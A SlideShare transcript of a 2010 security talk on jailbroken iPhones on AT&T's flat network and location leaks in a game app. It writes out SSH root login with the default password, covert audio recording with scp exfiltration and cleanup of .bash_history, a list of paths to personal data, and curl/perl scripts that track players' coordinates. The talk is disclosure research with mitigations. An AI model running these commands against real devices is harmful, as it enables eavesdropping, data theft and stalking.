The New World of
                   Smartphone Security
                       What Your iPhone Disclosed About You



   ...
Today’s Talk


                          “Pockets full of shells”




Friday, July 9, 2010
Today’s Talk


                                  “I can see you
                                 from my house”




Friday...
Who I am now




Friday, July 9, 2010
Old Smartphone Best
                            Practices

                                      = Bad


                 ...
New Smartphone Best
                            Practices

            1. IT will use the iPhone Configuration
            ...
If AT&T is in attendance:




Friday, July 9, 2010
If AT&T is in attendance:

                       •   Facts about AT&T and me:




Friday, July 9, 2010
If AT&T is in attendance:

                       •   Facts about AT&T and me:

                           •   I enjoy my ...
If AT&T is in attendance:

                       •   Facts about AT&T and me:

                           •   I enjoy my ...
If AT&T is in attendance:

                       •   Facts about AT&T and me:

                           •   I enjoy my ...
If AT&T is in attendance:

                       •   Facts about AT&T and me:

                           •   I enjoy my ...
If AT&T is in attendance:

                       •   Facts about AT&T and me:

                           •   I enjoy my ...
Jailbreaking

                       blackra1n



                       pwnagetool




Friday, July 9, 2010
It opens up a whole new world
                            of applications




Friday, July 9, 2010
It opens up a whole new world
                            of applications

           •       common Unix
                ...
It opens up a whole new world
                            of applications

           •       common Unix
                ...
It opens up a whole new world
                            of applications

           •       common Unix
                ...
It opens up a whole new world
                            of applications

           •       common Unix
                ...
It opens up a whole new world
                            of applications

           •       common Unix
                ...
Impact on security

                       “Jail breaking removes 80% of the
                       iPhone’s security prec...
How many iPhones are
                           jailbroken?


Friday, July 9, 2010
6.93%




                       [1]http://www.slideshare.net/pinchmedia/piracy-on-the-appstore



Friday, July 9, 2010
Global Stats




Friday, July 9, 2010
ifconfig
             root# ifconfig

             lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384

                ...
Interfaces




Friday, July 9, 2010
Interfaces
                       en0 = 802.11 interface




Friday, July 9, 2010
Interfaces
                       en0 = 802.11 interface
                       pdp_ip0 = primary cellular interface on AP...
Interfaces
                       en0 = 802.11 interface
                       pdp_ip0 = primary cellular interface on AP...
Interfaces
                       en0 = 802.11 interface
                       pdp_ip0 = primary cellular interface on AP...
Interfaces
                       en0 = 802.11 interface
                       pdp_ip0 = primary cellular interface on AP...
ifconfig

              pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST>
              mtu 1450
                    inet 10.69...
sshd




Friday, July 9, 2010
So what?



Friday, July 9, 2010
Until (about) October 16, 2009 AT&T did
                    not filter device to device IP network
                        ...
AT&T’s Network
                       Most people think it looks like this:




                            /32



Friday,...
AT&T’s Network
                           Actually, more like this:




                       Multiple /16’s


Friday, Ju...
Your smartphone (and laptop/
           blackberry, etc.) has been on one giant
                        flat network...


...
So I started looking around...




Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Devices On the Network
                           10,589* IPs scanned


                       Count      Port           W...
Other stuff out there

                       • Saw a Linux box with sshd
                       • Windows Mobile devices
...
Friday, July 9, 2010
ssh access between phones

                        Trevors-iPhone:~ root# ssh root@10.69.62.100

                        P...
Filesystem Guide

                  Interesting stuff:

           /private/var/mobile/Library/Mail - Email (IMAP Exchange...
/private/var/mobile/Library/CallHistory/call_history.db
                 /private/var/mobile/Library/AddressBook/AddressBo...
Let’s do a bit more
                       Erica Utilities - cmd line utilities for the
                       iPhone

   ...
Attacker                    Victim


                                      recAudio


                                    ...
I can hear you typing
                       Trevors-iPhone:~ root# scp bin/recAudio root@10.69.62.100:
                  ...
Nates-iPhone:~ root# ls -l *.aiff
               -rw-r--r-- 1 root wheel 43178 Oct 2 22:35 2009-10-92 at
               22...
Other bad things




Friday, July 9, 2010
Other bad things
                       • ./openURL tel://1-900-XXX-XXX




Friday, July 9, 2010
Other bad things
                       • ./openURL tel://1-900-XXX-XXX
                       • ./openURL tel://911 or te...
Other bad things
                       • ./openURL tel://1-900-XXX-XXX
                       • ./openURL tel://911 or te...
Other bad things
                       • ./openURL tel://1-900-XXX-XXX
                       • ./openURL tel://911 or te...
Other bad things
                       • ./openURL tel://1-900-XXX-XXX
                       • ./openURL tel://911 or te...
Worms and Exploits



Friday, July 9, 2010
Dutch Extortion




                         November 2009
Friday, July 9, 2010
ikee Worm




                       November 2009
Friday, July 9, 2010
Exploits


                  • Phone/Privacy.A* command line tool
                  • Phone/iBotNet.A* worm with C&C
     ...
Some good news




Friday, July 9, 2010
Some good news
                       •   AT&T does segment part of their network:




Friday, July 9, 2010
Some good news
                       •   AT&T does segment part of their network:

                           •   e.g. I ...
Some good news
                       •   AT&T does segment part of their network:

                           •   e.g. I ...
Some good news
                       •   AT&T does segment part of their network:

                           •   e.g. I ...
Some good news
                       •   AT&T does segment part of their network:

                           •   e.g. I ...
Some good news
                       •   AT&T does segment part of their network:

                           •   e.g. I ...
Some good news
                       •   AT&T does segment part of their network:

                           •   e.g. I ...
email to ID user

                               <img src=”http://10.69.62.220/i.jpg”>

             10.69.63.220:80      ...
What to do
                       •   Don’t Jailbreak your phone if you care about
                           security (so...
Privacy and Location
                            Based Apps



Friday, July 9, 2010
Location Based Apps




Friday, July 9, 2010
Location Based Apps
                       • Underworld: Sweet Deal




Friday, July 9, 2010
Location Based Apps
                       • Underworld: Sweet Deal
                       • Drug trafficking game with can...
Location Based Apps
                       • Underworld: Sweet Deal
                       • Drug trafficking game with can...
Location Based Apps
                       • Underworld: Sweet Deal
                       • Drug trafficking game with can...
Like Druglords




Friday, July 9, 2010
Underworld: Sweetdeal




Friday, July 9, 2010
Google Maps




Friday, July 9, 2010
Paros

                       • Client side proxy
                       • Configure iPhone to use machine running
        ...
Request




Friday, July 9, 2010
Response




Friday, July 9, 2010
Used to monitor players




Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Let’s pick a non-intel agency
                                   player



                                              c...
Request




Friday, July 9, 2010
Response




Friday, July 9, 2010
Lat/Lon to GMaps:




Friday, July 9, 2010
County Records




Friday, July 9, 2010
Facebook




Friday, July 9, 2010
Ok neat, what else?




Friday, July 9, 2010
Near real-time geolocation tracking of
                            players




Friday, July 9, 2010
cURL + perl + crontab = csv + gpsbabel =
     kml + Google Earth = EPIC screen shots




Friday, July 9, 2010
curl script
          #/bin/sh
          #
          # First login...
          #
          curl -s -H "User-Agent: Underw...
perl script
               #! /usr/bin/perl

               use strict;
               use warnings;

               # mak...
perl script output
                       39.93220206723633,-77.47186584472656,poppyseed
                       38.1375335...
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Comments/Feedback:
                       trevor.hawthorn@stratumsecurity.com
                            www.stratumsecur...
Upcoming SlideShare
Loading in …5
×

The New World of Smartphone Security

3,395 views

Published on

Published in: Technology, Business
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
3,395
On SlideShare
0
From Embeds
0
Number of Embeds
170
Actions
Shares
0
Downloads
61
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

The New World of Smartphone Security

  1. 1. The New World of Smartphone Security What Your iPhone Disclosed About You Trevor Hawthorn Managing Partner Friday, July 9, 2010
  2. 2. Today’s Talk “Pockets full of shells” Friday, July 9, 2010
  3. 3. Today’s Talk “I can see you from my house” Friday, July 9, 2010
  4. 4. Who I am now Friday, July 9, 2010
  5. 5. Old Smartphone Best Practices = Bad = Good Friday, July 9, 2010
  6. 6. New Smartphone Best Practices 1. IT will use the iPhone Configuration Utility so you can talk to Exchange, use the VPN, wireless, etc. 2. Get iFart, it’s hilarious. Friday, July 9, 2010
  7. 7. If AT&T is in attendance: Friday, July 9, 2010
  8. 8. If AT&T is in attendance: • Facts about AT&T and me: Friday, July 9, 2010
  9. 9. If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service Friday, July 9, 2010
  10. 10. If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service • Feel that I have fantastic coverage everywhere I go at all times Friday, July 9, 2010
  11. 11. If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service • Feel that I have fantastic coverage everywhere I go at all times • Am sure you have the largest/fastest 3G network, regardless of what VZW says Friday, July 9, 2010
  12. 12. If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service • Feel that I have fantastic coverage everywhere I go at all times • Am sure you have the largest/fastest 3G network, regardless of what VZW says • Looking forward to years of receiving quality service from you Friday, July 9, 2010
  13. 13. If AT&T is in attendance: • Facts about AT&T and me: • I enjoy my AT&T wireless service • Feel that I have fantastic coverage everywhere I go at all times • Am sure you have the largest/fastest 3G network, regardless of what VZW says • Looking forward to years of receiving quality service from you • Would love to chat Friday, July 9, 2010
  14. 14. Jailbreaking blackra1n pwnagetool Friday, July 9, 2010
  15. 15. It opens up a whole new world of applications Friday, July 9, 2010
  16. 16. It opens up a whole new world of applications • common Unix binaries Friday, July 9, 2010
  17. 17. It opens up a whole new world of applications • common Unix binaries • sshd Friday, July 9, 2010
  18. 18. It opens up a whole new world of applications • common Unix binaries • sshd • tethering Friday, July 9, 2010
  19. 19. It opens up a whole new world of applications • common Unix binaries • sshd • tethering • pirate software Friday, July 9, 2010
  20. 20. It opens up a whole new world of applications • common Unix binaries • sshd • tethering • pirate software • super easy to JB your phone Friday, July 9, 2010
  21. 21. Impact on security “Jail breaking removes 80% of the iPhone’s security precautions” Charlie Miller, SyScan 2009 Friday, July 9, 2010
  22. 22. How many iPhones are jailbroken? Friday, July 9, 2010
  23. 23. 6.93% [1]http://www.slideshare.net/pinchmedia/piracy-on-the-appstore Friday, July 9, 2010
  24. 24. Global Stats Friday, July 9, 2010
  25. 25. ifconfig root# ifconfig lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384 inet 127.0.0.1 netmask 0xff000000 en0: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500 ether 00:21:e9:09:e3:4f pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450 inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff pdp_ip1: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450 pdp_ip2: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024 pdp_ip3: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024 en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500 inet 192.168.20.1 netmask 0xffffff00 broadcast 192.168.20.255 ether 0a:0b:ad:0b:ab:e0 Friday, July 9, 2010
  26. 26. Interfaces Friday, July 9, 2010
  27. 27. Interfaces en0 = 802.11 interface Friday, July 9, 2010
  28. 28. Interfaces en0 = 802.11 interface pdp_ip0 = primary cellular interface on APN: wap.cingular Friday, July 9, 2010
  29. 29. Interfaces en0 = 802.11 interface pdp_ip0 = primary cellular interface on APN: wap.cingular pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail Friday, July 9, 2010
  30. 30. Interfaces en0 = 802.11 interface pdp_ip0 = primary cellular interface on APN: wap.cingular pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail pdp_ip2 = not sure Friday, July 9, 2010
  31. 31. Interfaces en0 = 802.11 interface pdp_ip0 = primary cellular interface on APN: wap.cingular pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail pdp_ip2 = not sure pdp_ip3 = used with tethering Friday, July 9, 2010
  32. 32. ifconfig pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450 inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff Friday, July 9, 2010
  33. 33. sshd Friday, July 9, 2010
  34. 34. So what? Friday, July 9, 2010
  35. 35. Until (about) October 16, 2009 AT&T did not filter device to device IP network traffic. Friday, July 9, 2010
  36. 36. AT&T’s Network Most people think it looks like this: /32 Friday, July 9, 2010
  37. 37. AT&T’s Network Actually, more like this: Multiple /16’s Friday, July 9, 2010
  38. 38. Your smartphone (and laptop/ blackberry, etc.) has been on one giant flat network... Friday, July 9, 2010
  39. 39. So I started looking around... Friday, July 9, 2010
  40. 40. Friday, July 9, 2010
  41. 41. Friday, July 9, 2010
  42. 42. Devices On the Network 10,589* IPs scanned Count Port What? 83 22 sshd 24 80 http 4 2008 PDANet 3,644 62078 iPhone Default Friday, July 9, 2010
  43. 43. Other stuff out there • Saw a Linux box with sshd • Windows Mobile devices • Blackberries • Windows PC’s • PDANet for the iPhone is an open proxy. Friday, July 9, 2010
  44. 44. Friday, July 9, 2010
  45. 45. ssh access between phones Trevors-iPhone:~ root# ssh root@10.69.62.100 Password: [alpine] Nates-iPhone:~ root# Nates-iPhone:~ root# id uid=0(root) gid=0(wheel) groups=0(wheel),1 (daemon),2(kmem),3(sys),4(tty),5(operator),8 (procview),9(procmod),20(staff),29 (certusers),80(admin) Friday, July 9, 2010
  46. 46. Filesystem Guide Interesting stuff: /private/var/mobile/Library/Mail - Email (IMAP Exchange, POP3, etc.) , /private/var/mobile/Library/SMS - SMS Text Messages /private/var/mobile/Library/Voicemail - Voicemail in .amr format /private/var/mobile/Library/AddressBook - Contacts /private/var/mobile/Library/CallHistory - Call History /private/var/mobile/Library/Notes - Notes Friday, July 9, 2010
  47. 47. /private/var/mobile/Library/CallHistory/call_history.db /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb /private/var/mobile/Library/AddressBook/AddressbookImages.sqlitedb /private/var/mobile/Library/Cookies/Cookies.plist /private/var/mobile/Library/Keyboard/dynamic-text.dat /private/var/mobile/Library/Mail/Accounts.plist /private/var/mobile/Library/Mail/(mail account name)/Deleted Messages /private/var/mobile/Library/Mail/(mail account name)/Sent Messages /private/var/mobile/Library/Mail/(mail account name)/INBOX /private/var/mobile/Library/Maps/History.plist /private/var/mobile/Library/YouTube/Bookmarks.plist /private/var/mobile/Library/Voicemail/(amr files) /private/var/mobile/Library/Voicemail/voicemail.db /private/var/mobile/Library/Safari/Bookmarks.plist /private/var/mobile/Library/Safari/History.plist /private/var/mobile/Library/Suspend.plist /private/var/mobile/Library/Safari/SuspendState.plist /private/var/mobile/Library/Safari/SMS/sms.db /private/var/mobile/Library/Preference/(various preference Plists) /private/var/mobile/Library/Notes/notes.db Friday, July 9, 2010
  48. 48. Let’s do a bit more Erica Utilities - cmd line utilities for the iPhone recAudio: Record audio from the recAudio onboard microphone. Queries the iPhone’s GPS API to findme return latitude/longitude Friday, July 9, 2010
  49. 49. Attacker Victim recAudio scp/ssh recording.aiff 10.69.62.220 10.69.62.100 Friday, July 9, 2010
  50. 50. I can hear you typing Trevors-iPhone:~ root# scp bin/recAudio root@10.69.62.100: Password: recAudio 100% 19KB 1.3KB/s 00:00 Trevors-iPhone:~ root# ssh root@10.69.62.100 Password: Nates-iPhone:~ root# ./recAudio Start talking. Press ^C to finish. Starting recording ^C Interrupted. Stopping recording Friday, July 9, 2010
  51. 51. Nates-iPhone:~ root# ls -l *.aiff -rw-r--r-- 1 root wheel 43178 Oct 2 22:35 2009-10-92 at 22:35:04.aiff Nates-iPhone:~ root# mv 2009-10-92 at 22:35:04.aiff test.aiff Trevors-iPhone: root# scp root@10.69.62.100:~/*.aiff . Password: test.aiff 100% 523KB 2.2KB/ s 00:00 Nates-iPhone:~ root# rm test.aiff recAudio .bash_history Nates-iPhone:~ root# last wtmp begins at Fri Oct 2 22:41 Nates-iPhone:~ root# Friday, July 9, 2010
  52. 52. Other bad things Friday, July 9, 2010
  53. 53. Other bad things • ./openURL tel://1-900-XXX-XXX Friday, July 9, 2010
  54. 54. Other bad things • ./openURL tel://1-900-XXX-XXX • ./openURL tel://911 or tel://mynumber Friday, July 9, 2010
  55. 55. Other bad things • ./openURL tel://1-900-XXX-XXX • ./openURL tel://911 or tel://mynumber • Pillage filesystem: email, sms, notes, app data, etc. Friday, July 9, 2010
  56. 56. Other bad things • ./openURL tel://1-900-XXX-XXX • ./openURL tel://911 or tel://mynumber • Pillage filesystem: email, sms, notes, app data, etc. • apt-get install tcpdump nmap Friday, July 9, 2010
  57. 57. Other bad things • ./openURL tel://1-900-XXX-XXX • ./openURL tel://911 or tel://mynumber • Pillage filesystem: email, sms, notes, app data, etc. • apt-get install tcpdump nmap • go wild on whatever network en0 is connected to. Friday, July 9, 2010
  58. 58. Worms and Exploits Friday, July 9, 2010
  59. 59. Dutch Extortion November 2009 Friday, July 9, 2010
  60. 60. ikee Worm November 2009 Friday, July 9, 2010
  61. 61. Exploits • Phone/Privacy.A* command line tool • Phone/iBotNet.A* worm with C&C *Discovered by security firm Intego Friday, July 9, 2010
  62. 62. Some good news Friday, July 9, 2010
  63. 63. Some good news • AT&T does segment part of their network: Friday, July 9, 2010
  64. 64. Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC Friday, July 9, 2010
  65. 65. Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston Friday, July 9, 2010
  66. 66. Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston • No easy way to target specific individual (Identity to AT&T NAT IP address not super easy) Friday, July 9, 2010
  67. 67. Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston • No easy way to target specific individual (Identity to AT&T NAT IP address not super easy) • No way to correlate 10.x.x.x IP to person via Safari Friday, July 9, 2010
  68. 68. Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston • No easy way to target specific individual (Identity to AT&T NAT IP address not super easy) • No way to correlate 10.x.x.x IP to person via Safari • decloak.net doesn’t really work in Mobile Safari Friday, July 9, 2010
  69. 69. Some good news • AT&T does segment part of their network: • e.g. I could not see friend in CA from DC • But I could see friend in Boston • No easy way to target specific individual (Identity to AT&T NAT IP address not super easy) • No way to correlate 10.x.x.x IP to person via Safari • decloak.net doesn’t really work in Mobile Safari • Man this is slow... Friday, July 9, 2010
  70. 70. email to ID user <img src=”http://10.69.62.220/i.jpg”> 10.69.63.220:80 10.69.63.110 src:10.69.63.110 10.69.63.220:80 10.69.63.110 dst:10.69.63.220 Friday, July 9, 2010
  71. 71. What to do • Don’t Jailbreak your phone if you care about security (sorry) • Change root and mobile users’ passwords • Attention Cydia Folks: Do not bind sshd to pdp interfaces; force password change upon install • IT Folks: Policy on jailbroken iphones • AT&T: Filter mobile to mobile IP traffic Friday, July 9, 2010
  72. 72. Privacy and Location Based Apps Friday, July 9, 2010
  73. 73. Location Based Apps Friday, July 9, 2010
  74. 74. Location Based Apps • Underworld: Sweet Deal Friday, July 9, 2010
  75. 75. Location Based Apps • Underworld: Sweet Deal • Drug trafficking game with candy Friday, July 9, 2010
  76. 76. Location Based Apps • Underworld: Sweet Deal • Drug trafficking game with candy • Location matters, move product from point A to point B Friday, July 9, 2010
  77. 77. Location Based Apps • Underworld: Sweet Deal • Drug trafficking game with candy • Location matters, move product from point A to point B • Phone sends high resolution coordinates to game server Friday, July 9, 2010
  78. 78. Like Druglords Friday, July 9, 2010
  79. 79. Underworld: Sweetdeal Friday, July 9, 2010
  80. 80. Google Maps Friday, July 9, 2010
  81. 81. Paros • Client side proxy • Configure iPhone to use machine running Paros’s IP address as proxy • Watch what your apps send and receive Friday, July 9, 2010
  82. 82. Request Friday, July 9, 2010
  83. 83. Response Friday, July 9, 2010
  84. 84. Used to monitor players Friday, July 9, 2010
  85. 85. Friday, July 9, 2010
  86. 86. Friday, July 9, 2010
  87. 87. Friday, July 9, 2010
  88. 88. Friday, July 9, 2010
  89. 89. Friday, July 9, 2010
  90. 90. Let’s pick a non-intel agency player chezk Friday, July 9, 2010
  91. 91. Request Friday, July 9, 2010
  92. 92. Response Friday, July 9, 2010
  93. 93. Lat/Lon to GMaps: Friday, July 9, 2010
  94. 94. County Records Friday, July 9, 2010
  95. 95. Facebook Friday, July 9, 2010
  96. 96. Ok neat, what else? Friday, July 9, 2010
  97. 97. Near real-time geolocation tracking of players Friday, July 9, 2010
  98. 98. cURL + perl + crontab = csv + gpsbabel = kml + Google Earth = EPIC screen shots Friday, July 9, 2010
  99. 99. curl script #/bin/sh # # First login... # curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/ 10.0.0d3" -d @/home/trevor/iphone/login.xml --dump-header /home/ trevor/iphone/headers.txt http://game.dl.a-steroids.com/TrafficServer/ # # Then update location curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/ 10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/ update_loc.xml http://game.dl.a-steroids.com/TrafficServer/ # # Get GMap obhjects curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/ 10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/ gmap_update.xml http://game.dl.a-steroids.com/TrafficServer/ Friday, July 9, 2010
  100. 100. perl script #! /usr/bin/perl use strict; use warnings; # make single or multiline input into one scalar my $glob = join('',(<>)); # extract name-to-flag records my @records = $glob =~ /(<name>.*?</lon>)/ig; for (@records) { my ($name,$lat,$lon) = $_ =~ qr|<name>(.*?)</name>.*?<lat>([-d.]*)</lat><lon>([-d .]*)</lon>|i; print "$lat,$lon,$namen"; } Friday, July 9, 2010
  101. 101. perl script output 39.93220206723633,-77.47186584472656,poppyseed 38.13753356933594,-77.06847380591797,Gadsden 39.98429718017578,-78.30014190673828,Ziggety 39.23520812988281,-77.40483581542969,Lexi 39.855418395996094,-77.2717056274414,Tatu 39.55705801582031,-77.4004086303711,Bigfoot 36.67790985107422,-77.5902328491211,Jeneko 38.297552490234375,-77.65829467773438,Stilbored 39.891050720214844,-77.55879211025781,Timoteo 39.66313247680664,-78.04374694824219,Gamber 36.295310314697266,-78.14061126700984,UnderWear Friday, July 9, 2010
  102. 102. Friday, July 9, 2010
  103. 103. Friday, July 9, 2010
  104. 104. Friday, July 9, 2010
  105. 105. Friday, July 9, 2010
  106. 106. Friday, July 9, 2010
  107. 107. Friday, July 9, 2010
  108. 108. Friday, July 9, 2010
  109. 109. Friday, July 9, 2010
  110. 110. Comments/Feedback: trevor.hawthorn@stratumsecurity.com www.stratumsecurity.com Twitter: @packetwerks @stratumsecurity Special Thanks: Tiago Stock Friday, July 9, 2010

×